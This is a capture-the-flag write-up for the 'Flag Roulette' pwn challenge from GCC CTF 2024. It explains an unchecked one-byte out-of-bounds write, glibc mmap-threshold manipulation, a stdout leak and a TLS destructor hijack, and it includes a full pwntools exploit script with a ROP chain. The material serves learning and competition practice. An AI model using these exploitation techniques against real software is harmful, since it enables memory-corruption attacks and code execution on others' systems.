Contents

GCC CTF 2024

https://i.imgur.com/lEppMvR.png
GCC CTF 2024

I spent some of my free time playing GCC CTF 2024. Below is my write-up for the last pwn challenge, Flag Roulette.

Pwn

Flag Roulette

Description

Are you tired of solving challs?

Here, have a little break. If we win my game, I will give you a flag.

I promise you I will not cheat :)

The flag is in the /flag file.

Author: 0xdeadbeef

Initial Analysis

In this challenge, we were provided a binary file named flag_roulette along with the supporting libraries libc, ld, and libseccomp. These libraries are essential for the binary’s execution. Let’s begin by examining the security mitigations implemented within the binary itself.

1
2
3
4
5
    Arch:     amd64-64-little
    RELRO:    Full RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      PIE enabled

All security mitigations appear to be active, including the provision of the libseccomp file, indicating the application of a seccomp filter in the binary. Our next step involves attempting to dump this filter.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
seccomp-tools dump ./flag_roulette_patched
 line  CODE  JT   JF      K
=================================
 0000: 0x20 0x00 0x00 0x00000004  A = arch
 0001: 0x15 0x00 0x0b 0xc000003e  if (A != ARCH_X86_64) goto 0013
 0002: 0x20 0x00 0x00 0x00000000  A = sys_number
 0003: 0x35 0x00 0x01 0x40000000  if (A < 0x40000000) goto 0005
 0004: 0x15 0x00 0x08 0xffffffff  if (A != 0xffffffff) goto 0013
 0005: 0x15 0x06 0x00 0x00000000  if (A == read) goto 0012
 0006: 0x15 0x05 0x00 0x00000001  if (A == write) goto 0012
 0007: 0x15 0x04 0x00 0x00000002  if (A == open) goto 0012
 0008: 0x15 0x03 0x00 0x00000003  if (A == close) goto 0012
 0009: 0x15 0x02 0x00 0x00000009  if (A == mmap) goto 0012
 0010: 0x15 0x01 0x00 0x0000000b  if (A == munmap) goto 0012
 0011: 0x15 0x00 0x01 0x0000003c  if (A != exit) goto 0013
 0012: 0x06 0x00 0x00 0x7fff0000  return ALLOW
 0013: 0x06 0x00 0x00 0x00000000  return KILL

Our options for code execution are limited to the traditional open-read-write strategy. We proceed by disassembling the binary to examine its key functions.

main

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
/*
 * Decompiled entry point of flag_roulette (decompiler output, kept verbatim).
 *
 * Runs a menu loop keyed on a single input character:
 *   '1' - place a bet: malloc a user-sized buffer, fill it with rand() bytes
 *         and let the user overwrite exactly one byte at a chosen index.
 *   '2' - delete the bet: free the buffer.
 *   '3' - leave the menu; if a bet exists, print it and compare it against
 *         the repeating byte pattern 71,67,67 ("GCC"), then call lose()/win().
 *
 * Only one bet can exist at a time (tracked by has_a_bet).
 */
int __fastcall __noreturn main(int argc, const char **argv, const char **envp)
{
  char v3; // [rsp+Ch] [rbp-24h] BYREF -- new value for the user-modified byte
  char has_a_bet; // [rsp+Dh] [rbp-23h] -- 1 while a bet buffer is allocated
  char i; // [rsp+Eh] [rbp-22h] -- menu choice character
  char v6; // [rsp+Fh] [rbp-21h] -- scratch used to drain the rest of the input line
  unsigned int v7; // [rsp+10h] [rbp-20h] BYREF -- index of the byte to modify
  unsigned int v8; // [rsp+14h] [rbp-1Ch] BYREF -- requested bet size in bytes
  unsigned int j; // [rsp+18h] [rbp-18h]
  unsigned int k; // [rsp+1Ch] [rbp-14h]
  void *bet; // [rsp+20h] [rbp-10h] -- the malloc'ed bet buffer
  unsigned __int64 v12; // [rsp+28h] [rbp-8h] -- value read from fs:0x28 (NOTE(review): presumably the stack canary)

  v12 = __readfsqword(0x28u);
  banner(argc, argv, envp);
  has_a_bet = 0;
  while ( 1 )
  {
    while ( 1 )
    {
      menu();
      i = 0;
      v6 = 0;
      // Skip leading newlines; the first other character is the menu choice.
      for ( i = getchar(); i == 10; i = getchar() )
        ;
      // Discard the remainder of the line.
      while ( v6 != 10 )
        v6 = getchar();
      // '3' leaves the inner menu loop and falls through to the has_a_bet check below.
      if ( i == '3' )
        break;
      if ( i <= '3' )
      {
        if ( i == '1' )
        {
          if ( has_a_bet == 1 )
          {
            puts("You already have a bet placed");
          }
          else
          {
            puts("How many bytes would you like to bet on ?");
            printf("> ");
            // The format is "%u" followed by a literal 'd'.
            __isoc99_scanf("%ud", &v8);
            // Accepted sizes: 128 (0x80) up to and including 135168 (0x21000).
            if ( (int)v8 > 127 )
            {
              if ( (int)v8 <= 135168 )
              {
                bet = malloc((int)v8);
                // Fill the buffer with rand() bytes, rerolling while the byte read
                // as char is <= 31 or the byte equals 127.
                // NOTE(review): if char is signed here, values >= 0x80 are rerolled too.
                for ( j = 0; j < v8; ++j )
                {
                  do
                  {
                    do
                      *((_BYTE *)bet + j) = rand();
                    while ( *((char *)bet + j) <= 31 );
                  }
                  while ( *((_BYTE *)bet + j) == 127 );
                }
                puts("Random pattern generated successfully");
                puts("\nAs a sign of good will, we will let you modify set exactly one byte in this sea of randomness");
                puts("Please choose the index of the byte to modify");
                printf("> ");
                __isoc99_scanf("%ud", &v7);
                puts("Please set the new value of this byte");
                printf("> ");
                // NOTE(review): "%u" stores an unsigned int through &v3 although v3 is a
                // char; going by the stack offsets above this would also overwrite
                // has_a_bet, i and v6 -- confirm in a debugger.
                __isoc99_scanf("%ud", &v3);
                // VULNERABILITY: v7 is never compared against v8, so this is a
                // one-byte write at an arbitrary unsigned-int offset from bet.
                *((_BYTE *)bet + v7) = v3;
                puts("Modification successful");
                has_a_bet = 1;
              }
              else
              {
                puts("Come on, you cannot be THAT lucky ;)");
              }
            }
            else
            {
              puts("Not enough bytes");
              puts("The bet is not risky enough");
            }
          }
        }
        else if ( i == '2' )
        {
          if ( has_a_bet )
          {
            // Release the bet and clear the pointer and flag so a new bet can be placed.
            free(bet);
            bet = 0LL;
            puts("Bet successfully deleted");
            has_a_bet = 0;
          }
          else
          {
            puts("You have no bet placed");
          }
        }
      }
    }
    // Reached only via choice '3': spinning requires an existing bet.
    if ( has_a_bet )
      break;
    puts("You have not placed a bet !");
  }
  printf("Your bet : %s\n", (const char *)bet);
  // The bet wins only if the buffer is the pattern 71,67,67 ('G','C','C')
  // repeated over v8 bytes; any mismatch calls lose().
  for ( k = 0; k < v8; k += 3 )
  {
    if ( *((_BYTE *)bet + k) != 71 )
      lose();
    if ( *((_BYTE *)bet + k + 1) != 67 )
      lose();
    if ( *((_BYTE *)bet + k + 2) != 67 )
      lose();
  }
  win();
}

Within this function, we find three interactive menus:

  • Place a bet
  • Delete a bet
  • Spin the roulette

Focusing on each menu, we start with the first. This menu checks whether a bet has already been placed using the has_a_bet variable. If there is none, it prompts for the size of the bet, accepting sizes from 0x80 to 0x21000 (inclusive). This size is passed to malloc, and the allocated memory is then filled with random values. Additionally, the menu lets us modify one byte within the allocated chunk, but the index is never checked against the chunk size. This oversight gives us a relative out-of-bounds write: we can set one byte at any offset from the chunk, as long as the offset fits in an unsigned int. With this flaw noted, we temporarily shift our focus away from this menu.

The second menu’s functionality is straightforward: it frees the previously allocated chunk. The third menu prints the bet and checks it against the repeating “GCC” pattern before the program exits.

After scrutinizing the main functions and their behaviors, we should now strategize on exploiting the identified vulnerability to achieve code execution.

Solution

Summarizing our progress:

  • Allocation of a chunk is possible within the size range from 0x80 to 0x21000.
  • Only a single chunk can be active at any given time.
  • The ability to free the currently active chunk is available.
  • Execution of an exit command is permitted.

Typically, in exploiting such scenarios, the initial step involves obtaining a memory leak. Following this, we strategize on utilizing the leak to facilitate code execution.

Getting libc leak

In order to achieve code execution, the first step is figuring out how to get a leak. It’s noteworthy that the largest chunk size we can allocate is quite large, more than 0x20000. Looking into how malloc works, there’s a detail where, if the requested size is large enough (at least mp_.mmap_threshold, which defaults to 128*1024 = 0x20000), it uses mmap instead of placing the chunk in the heap.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
...
DEFAULT_MMAP_THRESHOLD     128 * 1024
...
static struct malloc_par mp_ =
{
...
  .mmap_threshold = DEFAULT_MMAP_THRESHOLD,
...
};
...
static void *
sysmalloc (INTERNAL_SIZE_T nb, mstate av)
{
...
  /*
     If have mmap, and the request size meets the mmap threshold, and
     the system supports mmap, and there are few enough currently
     allocated mmapped regions, try to directly map this request
     rather than expanding top.
   */

  if (av == NULL
      || ((unsigned long) (nb) >= (unsigned long) (mp_.mmap_threshold)
	  && (mp_.n_mmaps < mp_.n_mmaps_max)))
    {
      char *mm;
#if HAVE_TUNABLES
      if (mp_.hp_pagesize > 0 && nb >= mp_.hp_pagesize)
	{
	  /* There is no need to isse the THP madvise call if Huge Pages are
	     used directly.  */
	  mm = sysmalloc_mmap (nb, mp_.hp_pagesize, mp_.hp_flags, av);
	  if (mm != MAP_FAILED)
	    return mm;
	}
#endif
      mm = sysmalloc_mmap (nb, pagesize, 0, av);
      if (mm != MAP_FAILED)
	return mm;
      tried_mmap = true;
    }
...
}

Let’s examine the heap memory layout when we execute malloc(0x21000).

1
2
3
4
5
6
7
gef> vmmap
...
0x00007ffff7d8c000 0x00007ffff7db1000 0x0000000000025000 0x0000000000000000 rw- <tls-th1>
...
gef> x/20gx 0x00007ffff7d8c000
0x7ffff7d8c000: 0x0000000000000000      0x0000000000022002
0x7ffff7d8c010: 0x45793d7536367100      0x703d5e772852523b

You’ll notice that the chunk is positioned just before the tls and libc areas. This means that after calling malloc(0x21000), the unchecked index lets us overwrite one byte at any writable address within the tls and libc regions.

But what if we want to write more? The first idea might be to free the chunk and then call malloc again. However, trying this initially leads to an error as follows.

1
2
3
How many bytes would you like to bet on ?
> 135168
[1]    58259 invalid system call  ./flag_roulette_patched

Using strace, we found a brk syscall, showing us that our attempt to use malloc didn’t trigger mmap as we expected.

1
2
3
brk(0x55bf6fa19000)                     = 0xc
+++ killed by SIGSYS +++
[1]    58515 invalid system call  strace ./flag_roulette_patched

Digging into why this happened, we looked at how free works and discovered something interesting. When you free a chunk that was allocated with mmap, it changes the mp_.mmap_threshold to the size of the chunk you just freed. So, our next malloc(0x21000) didn’t use mmap because, according to the new threshold, 0x21000 wasn’t big enough.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
void
__libc_free (void *mem)
{
...
  if (chunk_is_mmapped (p))                       /* release mmapped memory. */
    {
      /* See if the dynamic brk/mmap threshold needs adjusting.
	 Dumped fake mmapped chunks do not affect the threshold.  */
      if (!mp_.no_dyn_threshold
          && chunksize_nomask (p) > mp_.mmap_threshold
          && chunksize_nomask (p) <= DEFAULT_MMAP_THRESHOLD_MAX)
        {
          mp_.mmap_threshold = chunksize (p);
          mp_.trim_threshold = 2 * mp_.mmap_threshold;
          LIBC_PROBE (memory_mallopt_free_dyn_thresholds, 2,
                      mp_.mmap_threshold, mp_.trim_threshold);
        }
      munmap_chunk (p);
    }
...
}

To get around this, we need a good strategy. We noticed something in the __libc_free function: it only changes the mp_.mmap_threshold if mp_.no_dyn_threshold is 0 (false). We still have a one-byte out-of-bounds (OOB) write ability from when we allocated our chunk, and this offset from the libc area doesn’t change. This means we can tweak the mp_.no_dyn_threshold to 1 (true). Doing this means the threshold won’t change when we free a chunk, allowing us to do as many OOB writes to the tls and libc areas as we want. This works because our malloc(0x21000) will always use mmap, placing the chunk right before the tls and libc areas.

Now that we have the power to write out of bounds to tls and libc without limits, we can leak the libc address. The trick is to mess with stdout: change stdout->flags to 0x1800 and make stdout->_IO_write_ptr bigger than stdout->_IO_write_base. The next time we use puts(), it’ll spit out data from _IO_write_base to _IO_write_ptr, giving us the libc leak we need to move forward.

Stack Pivot via TLS DTOR

To achieve remote code execution, given the program terminates with exit, a common approach is to hijack the tls_dtor_list with a custom fake structure. This way, when __run_exit_handlers triggers __call_tls_dtors, it processes our crafted structure, allowing us a controlled call with the first argument in our hands.

However, this isn’t enough because of the seccomp filter, which limits us to an open-read-write of the flag file. So I figured that we need to do ROP, which means we need to be able to pivot the stack. After looking through all the available gadgets, I found one very good gadget:

1
0x00099ab4: mov rbp, [rsi+8]; mov rax, [rbx+0x40]; test byte ptr [rbx+0x50], 1; jne short 0x99a98; mov rdi, rsi; call rax;

This gadget is perfect for our needs because we found out that we can control both the [rsi+8] and rbx values. Here’s how it works in the context of our fake dtor_list:

  • rbx will point to the address of our crafted fake dtor_list.
  • rsi points to __exit_funcs, part of the libc area, allowing us to overwrite this section.

With these controls in place, the path to exploitation becomes quite clear. Here’s a simple walkthrough of what I did to make it work:

  • Make PTR_MANGLE zero to simplify creating our fake dtor_list.
  • Store /flag string in the tls area. We know its exact location thanks to its fixed distance from the libc base.
  • Change the tls_dtor_list (found at tls_base-0x50) to point to our fake dtor_list.
  • Now, at the address we’ve set in the tls_dtor_list, we create our fake dtor_list. The key move here is:
    • Set dtor_list->func to pivot_stack_gadget<<17.
  • Modify [rsi+0x8] (which corresponds to __exit_funcs+0x8) to point towards our ROP chain (location-0x8). This is essential for our stack pivot maneuver using leave ; ret, which essentially does mov rsp, rbp ; pop rbp ; ret.
  • Place the leave ; ret; gadget’s address at [rbx+0x40] (fake_dtor_list+0x40). Our stack pivot gadget will execute call rax, with rax coming from this address.
  • To avoid the jne jump in our gadget’s flow, set [rbx+0x50] to 0.
  • Fill in our ROP chain at the address we’ve set up in __exit_funcs+0x8.
  • Trigger the exit mechanism to set everything into motion.

By following these steps, we manage to get the flag. Below, you’ll find my solver script with detailed comments.

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
from pwn import *

# Load the target binary and the libraries shipped with the challenge.
exe = ELF("flag_roulette_patched")
libc = ELF("./libc.so.6")
ld = ELF("./ld-linux-x86-64.so.2")

# pwntools context configuration for this target.
context.binary = exe
context.arch = 'amd64'
context.encoding = 'latin'
context.log_level = 'INFO'
# Terminal command used when attaching gdb (see conn()).
context.terminal = ['wezterm', 'cli', 'split-pane', '--top', '--percent', '70']
# NOTE(review): `warnings` is not imported explicitly in this script;
# presumably it comes in through `from pwn import *` -- confirm.
warnings.simplefilter("ignore")

# Remote challenge endpoint.
remote_url = "worker01.gcc-ctf.com"
remote_port = 10873
# NOTE: this first gdbscript value is dead -- it is overwritten two
# statements below, so only the __call_tls_dtors breakpoint is used.
gdbscript = '''
b malloc.c:3352
'''
gdbscript = 'b *__call_tls_dtors'

def conn():
    """Open the tube to the target.

    Without the LOCAL argument, connect to the remote service. With LOCAL,
    spawn the binary as a local process; if PLT_DEBUG is also set, attach
    gdb with `gdbscript` and pause before continuing.
    """
    if not args.LOCAL:
        return remote(remote_url, remote_port)

    tube = process([exe.path])
    if args.PLT_DEBUG:
        gdb.attach(tube, gdbscript=gdbscript)
        pause()
    return tube

def demangle(val, is_heap_base=False):
    """Recover a value that was XORed with itself shifted right by 12 bits.

    Walks 12-bit windows from bit 52 downwards; each window of the partially
    recovered value, shifted right by 12, is XORed back into the value.
    With is_heap_base=True the value is simply shifted left by 12 instead.
    (Presumably a helper for glibc safe-linking pointers; it is not used
    elsewhere in this script.)
    """
    if is_heap_base:
        return val << 12

    window = 0xfff << 52
    while window != 0:
        val ^= (val & window) >> 12
        window >>= 12
    return val

def mangle(heap_addr, val):
    """Return val XORed with heap_addr shifted right by 12 bits."""
    shifted_addr = heap_addr >> 12
    return val ^ shifted_addr

# Global tube used by every helper below, and the prompt the menu prints.
r = conn()
menu_delim = b'> '


def logleak(name, val):
    """Log `name = <val in hex>` at info level."""
    info(name + (' = %#x' % val))


def sa(delim, data):
    """Send data after delim has been received."""
    return r.sendafter(delim, data)


def sla(delim, line):
    """Send line (with a trailing newline) after delim has been received."""
    return r.sendlineafter(delim, line)


def sl(line):
    """Send line with a trailing newline."""
    return r.sendline(line)


def so(data):
    """Send raw data."""
    return r.send(data)


def sn(num):
    """Encode a number as its decimal string in bytes."""
    return str(num).encode()


def menu(num):
    """Answer the menu prompt with the given choice number."""
    return sla(menu_delim, sn(num))

def place(sz, offset, val):
    """Menu option 1: place a bet of sz bytes, then set the byte at offset to val.

    The three values answer, in order, the size, index and new-value prompts.
    """
    menu(1)
    for answer in (sz, offset, val):
        sla(b'> ', sn(answer))

def free():
    """Menu option 2: delete (free) the current bet."""
    delete_choice = 2
    menu(delete_choice)

def win():
    """Menu option 3: spin the roulette, which ends the program."""
    spin_choice = 3
    menu(spin_choice)

# The default mp_.mmap_threshold is 0x20000, so malloc(0x21000) is served by mmap.
# Use the relative OOB write of this first allocation to set
# mp_.no_dyn_threshold (at offset 0x1f8398 from the chunk) to 1.
place(0x21000, 0x1f8398, 0x1)
# Because mp_.no_dyn_threshold is now set, free() will not raise
# mp_.mmap_threshold to the size of the freed chunk.
free()
# From now on every malloc(0x21000) is still at or above mmap_threshold
# (which stays at 0x20000 thanks to the overwrite above),
# so each new allocation goes through mmap again :)

# With the relative OOB write from the mmapped chunk (which sits before the tls and libc areas),
# we effectively get unlimited one-byte writes (the only limit is that the offset is an unsigned int).
def rel_write(offset, val):
    """Write one byte val at offset from a fresh 0x21000-byte bet, then free the bet."""
    chunk_size = 0x21000
    place(chunk_size, offset, val)
    free()

def rel_write_8(offset, val):
    """Write val as 8 bytes (p64 packing) starting at offset, one rel_write per byte."""
    for index, byte in enumerate(p64(val)):
        rel_write(offset + index, byte)
'''
LIBC LEAK
'''
# Overwrite fields of stdout to get a leak.
# Set the 4-byte flags field (offset 0x1f9770 from the chunk) to 0x1800, byte by byte.
rel_write(0x1f9770, 0x00)
rel_write(0x1f9771, 0x18)
rel_write(0x1f9772, 0x00)
rel_write(0x1f9773, 0x00)

# Overwrite the lowest byte of _IO_write_ptr with 0x10.
# place() is called directly (not rel_write) so the bet stays allocated while we read the leak.
place(0x21000, 0x1f9798, 0x10)
# After this overwrite, the next puts() prints the data between _IO_write_base and _IO_write_ptr
# (which contains the _IO_stdfile_1_lock address).
# Skip the first 5 bytes of output, then take the next 6 bytes as the low bytes of the pointer.
r.recv(5)
leaked_libc = u64(r.recv(6).ljust(8, b'\x00'))
logleak('leaked_libc', leaked_libc)
# Rebase libc from the leaked _IO_stdfile_1_lock address.
libc.address =  leaked_libc - libc.symbols['_IO_stdfile_1_lock']
logleak('libc.address', libc.address)
# Delete the bet that the direct place() call above left allocated.
free()

'''
STACK PIVOT via TLS DTOR
'''
# Overwrite the pointer-mangling value (at tls_base+0x30) with 0.
# tls_base is the absolute address; tls_base_offset is the same location
# expressed as an offset from the mmapped chunk, for use with rel_write*.
tls_base = libc.address-0x28c0
tls_base_offset = 0x22730
logleak('tls_base', tls_base)
rel_write_8(tls_base_offset+0x30, 0x0)
rel_write(tls_base_offset+0x30, 0x0) # I don't know why...

# Write the "/flag" string (NUL-padded to 8 bytes) at tls_base+0x50.
info("Writing /flag...")
flag_pos = tls_base+0x50
flag_off = tls_base_offset+0x50
rel_write_8(flag_off, u64(b'/flag\x00\x00\x00'))

# Overwrite tls_dtor_list (at tls_base-0x50) with tls_base+0x60,
# the address where the fake dtor_list entry is built below.
info("Writing tls_dtor_list...")
tls_dtor_list = tls_base-0x50
tls_dtor_list_off = tls_base_offset-0x50
curr_dtor = tls_base+0x60 # rbx
rel_write_8(tls_dtor_list_off, curr_dtor) # First entry of dtor_list

# Set the fake entry's func field to the stack-pivot gadget, shifted left by 17.
info("Writing pivot_stack_gadget...")
pivot_stack_gadget = libc.address+0x00099ab4 # mov rbp, [rsi+8]; mov rax, [rbx+0x40]; test byte ptr [rbx+0x50], 1; jne short 0x99a98; mov rdi, rsi; call rax;
curr_dtor_off = tls_base_offset+0x60
rel_write_8(curr_dtor_off, pivot_stack_gadget<<17) # func

# Observed in gdb: rsi points to __exit_funcs when the gadget runs.
# Overwrite __exit_funcs+0x8 ([rsi+0x8]) with the target rbp (tls_base+0x100).
info("Writing __exit_funcs+0x8...")
rel_write_8(0x1f8838, tls_base+0x100)

# Overwrite [rbx+0x40] (which is curr_dtor+0x40) with a leave; ret gadget,
# which the pivot gadget loads into rax and calls.
info("Writing curr_dtor+0x40...")
leave_ret = libc.address+0x00141a03
rel_write_8(curr_dtor_off+0x40, leave_ret)

# Overwrite the byte at [rbx+0x50] with 0 so the gadget's jne is not taken.
info("Writing curr_dtor+0x50...")
rel_write(curr_dtor_off+0x50, 0x0)

# Build the open-read-write ROP chain and write it starting at rbp+0x8 (tls_base+0x108).
info("Writing ROPChain...")
pop_rdi = libc.address+0x0017964f
pop_rsi = libc.address+0x0014f520
pop_rdx = libc.address+0x000fd76d
syscall = libc.address+0x00121f57
pop_rax = libc.address+0x0013fcf4
xchg_rdi_rax = libc.address+0x00169b4d
ropchain = [
    # open("/flag", 0, 0) via raw syscall number 2; flag_pos holds the "/flag" string
    pop_rdi,
    flag_pos,
    pop_rsi,
    0,
    pop_rdx,
    0,
    pop_rax,
    2,
    syscall,

    # read(fd, flag_pos, 0x100) -- going by the gadget's name, the fd returned
    # by open() in rax is moved into rdi
    xchg_rdi_rax,
    pop_rsi,
    flag_pos,
    pop_rdx,
    0x100,
    libc.sym.read,

    # puts(flag_pos) -- print the file contents that were read over the path string
    pop_rdi,
    flag_pos,
    libc.sym.puts,
]
# Write the chain one 8-byte entry at a time through the one-byte OOB write.
rop_off = tls_base_offset+0x108
for i, num in enumerate(ropchain):
    rel_write_8(rop_off+(i*8), num)

'''
EXIT AND WIN
'''
info("Win...")
# Option 3 only proceeds when a bet exists, so place a small throwaway bet first.
place(0x200, 0, 0) # Place random bet
# Spin the roulette: the program exits, which triggers the hijacked TLS destructor.
win() # exit :)

# Hand the tube to the user to read the printed flag.
r.interactive()

Flag: GCC{Th0s3_p0in7S_R_w3lL_deS3rvEd_Gig4ch4d}

Social Media

Follow me on twitter